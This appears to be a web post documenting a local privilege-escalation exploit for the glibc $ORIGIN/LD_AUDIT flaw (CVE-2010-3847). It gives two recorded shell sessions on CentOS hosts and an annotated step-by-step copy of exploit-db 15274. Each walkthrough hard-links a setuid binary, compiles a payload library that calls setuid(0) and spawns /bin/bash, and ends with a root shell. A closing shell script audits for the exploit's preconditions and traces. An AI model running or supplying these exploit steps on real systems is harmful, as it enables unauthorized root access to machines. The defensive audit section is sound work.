Linux (CVE-2010-3847) vulnerability and exploitation method


【Linux privilege escalation record】

The vulnerable Linux system:

[root@dbserver a]# cat /etc/redhat-release
CentOS release 6.3 (Final)
[root@dbserver a]# uname -a
Linux dbserver 2.6.32-279.5.2.el6.i686 #1 SMP Thu Aug 23 22:16:48 UTC 2012 i686 i686 i386 GNU/Linux

【Privilege escalation process record】

[root@dbserver a]# useradd test
[root@dbserver a]# passwd test
Changing password for user test.
New password:
BAD PASSWORD: it is based on a dictionary word
BAD PASSWORD: is too simple
Retype new password:
passwd: all authentication tokens updated successfully.
[root@dbserver a]# su  - test
[test@dbserver ~]$ ls
[test@dbserver ~]$ cd /tmp/
[test@dbserver tmp]$ mkdir exploit
[test@dbserver tmp]$ cd exploit/
[test@dbserver exploit]$ ln /bin/ping /tmp/exploit/target
[test@dbserver exploit]$ exec 3< /tmp/exploit/target
[test@dbserver exploit]$ ls -al
total 48
drwxrwxr-x   2 test test  4096 Jan  4 19:49 .
drwxrwxrwt. 37 root root  4096 Jan  4 19:49 ..
-rwsr-xr-x.  2 root root 36892 Jul 18  2011 target
[test@dbserver exploit]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Jan  4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target
[test@dbserver exploit]$ cd ..
[test@dbserver tmp]$ rm -rf /tmp/exploit/
[test@dbserver tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Jan  4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target (deleted)
[test@dbserver tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Jan  4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target (deleted)
[test@dbserver tmp]$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
^D    # press Ctrl+D
[test@dbserver tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@dbserver tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 test test 4163 Jan  4 19:53 /tmp/exploit
[test@dbserver tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@dbserver a]# whoami
root
[root@dbserver a]# id
uid=0(root) gid=0(root) groups=0(root)

【Second test record】

[root@91hpay ~]# useradd test
[root@91hpay ~]# passwd test
Changing password for user test.
New password:
BAD PASSWORD: it is based on a dictionary word
BAD PASSWORD: is too simple
Retype new password:
passwd: all authentication tokens updated successfully.
[root@91hpay ~]# su - test
[test@91hpay ~]$ cd /tmp/
[test@91hpay tmp]$ mkdir test
[test@91hpay tmp]$ cd test/
[test@91hpay test]$ ln /bin/ping /tmp/test/test
[test@91hpay test]$ cd ..
[test@91hpay tmp]$ exec 3< /tmp/test/test
[test@91hpay tmp]$ ls -al /tmp/test/test
-rwsr-xr-x. 2 root root 41432 Nov 12  2010 /tmp/test/test
[test@91hpay tmp]$ ls -l /proc/$$/fd/3
lr-x------. 1 test test 64 Jan  5 12:05 /proc/19378/fd/3 -> /tmp/test/test
[test@91hpay tmp]$ rm -rf /tmp/test
[test@91hpay tmp]$ ls -l /proc/$$/fd/3
lr-x------. 1 test test 64 Jan  5 12:05 /proc/19378/fd/3 -> /tmp/test/test (deleted)
[test@91hpay tmp]$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
[test@91hpay tmp]$ gcc -w -fPIC -shared -o /tmp/test payload.c
payload.c:5: error: redefinition of ‘init’
payload.c:1: note: previous definition of ‘init’ was here
[test@91hpay tmp]$ ls -l /tmp/test
ls: cannot access /tmp/test: No such file or directory
[test@91hpay tmp]$ vi payload.c
[test@91hpay tmp]$ ls -al payload.c
-rw-rw-r--. 1 test test 77 Jan  5 12:09 payload.c
[test@91hpay tmp]$ gcc -w -fPIC -shared -o /tmp/test payload.c
[test@91hpay tmp]$ ls -al /tmp/test
-rwxrwxr-x. 1 test test 6020 Jan  5 12:09 /tmp/test
[test@91hpay tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
[root@91hpay ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@91hpay ~]# cat /etc/redhat-release
CentOS Linux release 6.0 (Final)
[root@91hpay ~]# uname -a
Linux 91hpay.com 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux

【Process description】

This vulnerability affects Linux and has been public for some time. You only need to look for a file with the setuid bit set; if one is present, privilege escalation basically succeeds.

The concrete method is as follows:

$ORIGIN is an ELF substitution sequence that stands for the location, in the filesystem hierarchy, of the executable being loaded. The way glibc's dynamic linker expands the $ORIGIN substitution for privileged applications is flawed: a local user can gain elevated privileges by creating a hard link to a setuid application and forcing the expansion of $ORIGIN through LD_AUDIT.

The concrete steps are as follows:

# Create a directory we control under /tmp
$ mkdir /tmp/exploit
# Link to a suid binary, thereby changing the definition of $ORIGIN
$ ln /bin/ping /tmp/exploit/target
# Open a file descriptor to the target binary
$ exec 3< /tmp/exploit/target
# The descriptor is now accessible via /proc
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# Remove the directory created earlier
$ rm -rf /tmp/exploit/
# The /proc link still exists, but is now marked as deleted
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
# Replace the directory with a payload DSO, making $ORIGIN a valid target for dlopen()
$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
# Force the link in /proc to load $ORIGIN via LD_AUDIT
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)

http://www.exploit-db.com/exploits/15274/
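The steps above depend on two things an administrator can check for: a directory the attacker can write to on the same filesystem as a setuid binary, so that the ln step succeeds, and a setuid binary that is then left with an extra hard link and held open after its directory is deleted. The POSIX shell script below is an added audit example written for this page; it is not from the original post or from exploit-db 15274. It assumes GNU find, stat and awk and a mounted /proc; the mount-table samples in it are constructed. It goes beyond the page's own /tmp and /bin/ping case in that it scans any directory and any mount table.

```shell
#!/bin/sh
# Added audit example for CVE-2010-3847 (not code from the original post or
# from exploit-db 15274). Assumes GNU find, stat and awk and a mounted /proc.
# It looks for the preconditions and the trace of the hard-link trick shown
# on this page, and reports two settings that make the ln step fail:
#   - /tmp on its own filesystem: link(2) across filesystems fails with EXDEV
#   - fs.protected_hardlinks=1 (Linux 3.6 and later): a user cannot hard-link
#     a file they do not own

# Print setuid files under $1 that have more than one hard link.
# "ln /bin/ping /tmp/exploit/target" leaves /bin/ping with a link count
# of 2 until the extra link is removed again. /proc, /sys and /dev are pruned.
find_multilinked_setuid() {
    find "$1" \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
        -type f -perm -4000 -links +1 -print 2>/dev/null
}

# Exit 0 if the mount table on stdin (/proc/mounts format) lists $1 as a
# mount point of its own.
is_separate_mount() {
    awk -v mp="$1" '$2 == mp { found = 1 } END { exit !found }'
}

# Exit 0 if the kernel refuses hard links to files the caller does not own.
protected_hardlinks_enabled() {
    [ -r /proc/sys/fs/protected_hardlinks ] &&
        [ "$(cat /proc/sys/fs/protected_hardlinks)" = "1" ]
}

# Print open descriptors (of processes readable by the caller) that point at
# an unlinked file which still carries the setuid bit: the state the page's
# session is in after "exec 3< target" followed by "rm -rf /tmp/exploit".
find_deleted_setuid_fds() {
    for fd in /proc/[0-9]*/fd/*; do
        target=$(readlink "$fd" 2>/dev/null) || continue
        case "$target" in
            *' (deleted)') ;;
            *) continue ;;
        esac
        # stat -L follows the /proc link to the still-open inode; %a prints the
        # mode in octal, with a leading 4, 5, 6 or 7 when the setuid bit is set.
        mode=$(stat -L -c %a "$fd" 2>/dev/null) || continue
        case "$mode" in
            4???|5???|6???|7???) echo "$fd -> $target (mode $mode)" ;;
        esac
    done
}

# Constructed sample mount tables (not captured from a real host).
SAMPLE_MOUNTS_SEPARATE='/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0'
SAMPLE_MOUNTS_SHARED='/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda2 /home ext4 rw,relatime 0 0'

# Live audit of the current host, run as: sh audit.sh audit
if [ "${1:-}" = "audit" ]; then
    echo "== setuid files with more than one hard link under / =="
    find_multilinked_setuid /
    echo "== open descriptors to unlinked setuid files =="
    find_deleted_setuid_fds
    if is_separate_mount /tmp < /proc/mounts; then
        echo "/tmp is a separate mount: hard links from the root filesystem into /tmp fail"
    else
        echo "/tmp shares a filesystem with /: hard links to setuid binaries there are possible"
    fi
    if protected_hardlinks_enabled; then
        echo "fs.protected_hardlinks=1: unprivileged users cannot link files they do not own"
    else
        echo "fs.protected_hardlinks is off or not available on this kernel"
    fi
fi
```

A hit from find_multilinked_setuid is worth investigating but is not proof on its own, since a package may legitimately install one setuid binary under two names. Neither a separate /tmp nor fs.protected_hardlinks fixes the flaw in ld.so itself; only the vendor glibc update does. The checks narrow the preconditions and spot the trace that the sessions on this page leave behind.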
